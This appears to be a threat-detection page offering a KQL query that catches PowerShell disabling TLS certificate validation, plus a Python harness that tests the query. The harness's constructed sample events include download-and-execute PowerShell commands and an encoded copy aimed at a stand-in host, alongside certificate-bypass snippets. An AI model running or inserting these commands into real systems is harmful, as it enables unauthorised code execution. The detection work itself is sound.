Query Details

Detect TLS Validation Bypass via PowerShell

Query

**Detect TLS validation bypass via PowerShell**

PowerShell disabling TLS certificate validation before it downloads a payload is a small step in the chain, but a very useful one from a detection point of view.
Just opening a fake Boeing RFQ document was enough to trigger a full attack chain, starting from a DOCX and moving through RTF, JavaScript, PowerShell and even a full Python runtime, ending with Cobalt Strike running in memory.
Nothing particularly new in terms of techniques, but the way everything is chained together makes it effective and easy to miss: it relies on tools and formats we see daily.
Focusing on catching that IoA pattern, I created the KQL detection below.

```
DeviceProcessEvents 
| where Timestamp > ago(7d) 
| where FileName in~ ("powershell.exe","pwsh.exe") 
| where ProcessCommandLine has_any ("ServerCertificateValidationCallback","TrustAllCertsPolicy","SkipCertificateCheck","CertificatePolicy") 
| project Timestamp, DeviceName,DeviceId, AccountName, FileName, ProcessCommandLine , ReportId
```

Explanation

This KQL (Kusto Query Language) query is designed to detect suspicious activity related to the use of PowerShell to bypass TLS (Transport Layer Security) certificate validation. Here's a simple breakdown of what the query does:

  1. Data Source: The query looks at DeviceProcessEvents, which contains information about processes running on devices.

  2. Time Frame: It filters events from the last 7 days (Timestamp > ago(7d)).

  3. Targeted Processes: It specifically focuses on processes where the file name is either powershell.exe (Windows PowerShell) or pwsh.exe (PowerShell 7). The in~ operator makes the comparison case-insensitive.

  4. Suspicious Commands: The query searches the command line of these processes for terms that are indicative of TLS validation bypass techniques. has_any matches whole terms case-insensitively, so a substring inside a longer identifier does not count. The terms are:

    • ServerCertificateValidationCallback
    • TrustAllCertsPolicy
    • SkipCertificateCheck
    • CertificatePolicy

  5. Output: The query projects (selects) relevant information for further analysis, including:

    • Timestamp: When the event occurred.
    • DeviceName: The name of the device where the event was logged.
    • DeviceId: The unique identifier for the device.
    • AccountName: The user account under which the process was run.
    • FileName: The name of the executable file.
    • ProcessCommandLine: The full command line that was executed.
    • ReportId: The event identifier; combined with DeviceName and Timestamp it uniquely references the event.

In summary, this query is designed to identify instances where PowerShell scripts are potentially disabling TLS certificate validation, which could be part of a larger attack chain involving malicious payloads. This is a common technique used by attackers to avoid certificate errors when downloading malicious content from infrastructure with self-signed or otherwise untrusted certificates. Two caveats when operating it: the match is against the plaintext command line only, so a script loaded from a file or passed through -EncodedCommand will not trigger it unless the content is decoded first; and -SkipCertificateCheck is a legitimate Invoke-WebRequest/Invoke-RestMethod parameter in PowerShell 7, so hits on pwsh.exe need triage against the target URL and the account involved.
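To see what the query's filters do and do not catch, here is an added Python example (not part of the original page and not the author's code) that replays the same FileName and has_any filters over a few constructed DeviceProcessEvents rows, approximating Kusto's has_any as a case-insensitive match on whole alphanumeric terms, and then goes one step beyond the query by decoding -EncodedCommand arguments before matching. The sample rows, the ReportId values and the example.invalid URL are constructed; the time window is omitted.

```python
import base64
import re

# Terms from the page's has_any() clause.
TERMS = (
    "ServerCertificateValidationCallback",
    "TrustAllCertsPolicy",
    "SkipCertificateCheck",
    "CertificatePolicy",
)
POWERSHELL_BINARIES = ("powershell.exe", "pwsh.exe")

# A script an attacker might hide behind -EncodedCommand (constructed).
HIDDEN_SCRIPT = (
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; "
    "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/p.ps1')"
)
# PowerShell expects -EncodedCommand to be base64 of the UTF-16LE script bytes.
ENCODED_SCRIPT = base64.b64encode(HIDDEN_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed DeviceProcessEvents rows, reduced to the columns the query touches.
SAMPLE_EVENTS = [
    {"ReportId": 1, "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -nop -w hidden -c \"[System.Net.ServicePointManager]::"
                           "ServerCertificateValidationCallback = {$true}; IEX (New-Object "
                           "Net.WebClient).DownloadString('https://example.invalid/p.ps1')\""},
    {"ReportId": 2, "FileName": "POWERSHELL.EXE",   # upper case: exercises in~
     "ProcessCommandLine": "POWERSHELL.EXE -c \"Add-Type 'class TrustAllCertsPolicy : "
                           "System.Net.ICertificatePolicy { public bool CheckValidationResult("
                           "System.Net.ServicePoint a, System.Security.Cryptography."
                           "X509Certificates.X509Certificate b, System.Net.WebRequest c, int d) "
                           "{ return true; } }'; [System.Net.ServicePointManager]::"
                           "CertificatePolicy = New-Object TrustAllCertsPolicy\""},
    {"ReportId": 3, "FileName": "pwsh.exe",         # legitimate-looking PowerShell 7 usage
     "ProcessCommandLine": "pwsh.exe -c \"Invoke-RestMethod -SkipCertificateCheck "
                           "-Uri https://example.invalid/api\""},
    {"ReportId": 4, "FileName": "powershell.exe",   # same bypass, base64-encoded
     "ProcessCommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED_SCRIPT}"},
    {"ReportId": 5, "FileName": "cmd.exe",          # TLS bypass, but not PowerShell
     "ProcessCommandLine": "cmd.exe /c curl.exe -k https://example.invalid/p.ps1 -o p.ps1"},
]

_TERM_RE = re.compile(r"[A-Za-z0-9]+")
# -e, -ec, -enc and -EncodedCommand followed by a base64 blob.
_ENC_RE = re.compile(r"(?<!\S)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def has_any(text, terms):
    """Approximation of Kusto has_any: case-insensitive match on whole terms,
    where a term is a maximal run of alphanumeric characters."""
    tokens = {t.lower() for t in _TERM_RE.findall(text)}
    return any(term.lower() in tokens for term in terms)


def is_powershell(event):
    """Kusto in~ is case-insensitive, so compare lower-cased file names."""
    return event["FileName"].lower() in POWERSHELL_BINARIES


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand body, or None if absent or not valid base64."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError
        return None
    return raw.decode("utf-16-le", errors="ignore")


def run_query(events):
    """The page's query minus the time window; returns matching ReportIds."""
    return [e["ReportId"] for e in events
            if is_powershell(e) and has_any(e["ProcessCommandLine"], TERMS)]


def run_query_with_decoding(events):
    """Same filters, but the decoded -EncodedCommand body is matched as well."""
    hits = []
    for e in events:
        if not is_powershell(e):
            continue
        text = e["ProcessCommandLine"]
        decoded = decode_encoded_command(text)
        if decoded:
            text = f"{text} {decoded}"
        if has_any(text, TERMS):
            hits.append(e["ReportId"])
    return hits


if __name__ == "__main__":
    print("query as written:", run_query(SAMPLE_EVENTS))            # [1, 2, 3]
    print("with decoding   :", run_query_with_decoding(SAMPLE_EVENTS))  # [1, 2, 3, 4]
```

Row 4 shows the gap the plaintext match leaves: the encoded variant of exactly the same bypass is invisible until the base64 is decoded, so in production either decode -EncodedCommand in the query (or a companion query) or pair this rule with Script Block Logging, which records the decoded script. Row 3 is the false-positive case worth remembering: -SkipCertificateCheck is a normal PowerShell 7 parameter, so the hit is real but not necessarily malicious. Row 5 is out of scope by design; a curl -k from cmd.exe needs a separate rule.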

Details


Sergio Albea

Released: April 3, 2026

Tables

DeviceProcessEvents

Keywords

DeviceProcessEvents, Timestamp, FileName, ProcessCommandLine, DeviceName, DeviceId, AccountName, ReportId

Operators

DeviceProcessEvents, |, where, >, ago(), in~, has_any, project
